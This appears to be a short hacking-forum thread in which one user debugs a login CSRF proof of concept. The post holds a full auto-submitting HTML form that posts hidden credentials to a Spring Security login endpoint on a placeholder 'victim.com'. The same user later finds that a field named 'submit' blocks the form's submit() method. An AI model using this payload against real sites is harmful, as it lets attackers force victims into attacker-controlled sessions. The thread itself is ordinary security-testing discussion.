Welcome to HBH V2 ! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Form submit via JS - CSRF


gobzi's Avatar
Member
0 0

Hey,

I'm banging my head here, maybe being stupid.. When I submit the following request it wont log me in. However, it logs me in when I use purely HTML markup<input type="submit" value="Submit request" /> Also, when I submit different POST requests, JS submit works fine! :|

(ignore the PHP tags)

[php]<html> <body> <form action="https://victim.com/j_spring_security_check" method="POST"> <input type="hidden" name="j&#95;username" value="uatuser1&#64;victim&#46;com" /> <input type="hidden" name="j&#95;password" value="Aa123456" /> <input type="hidden" name="submit" value="Sign&#32;In" /> </form> <script>document.forms[0].submit();</script> </body> </html> [/php]


gobzi's Avatar
Member
0 0

lol there's a conflict between the parameter submit and submit() :D:D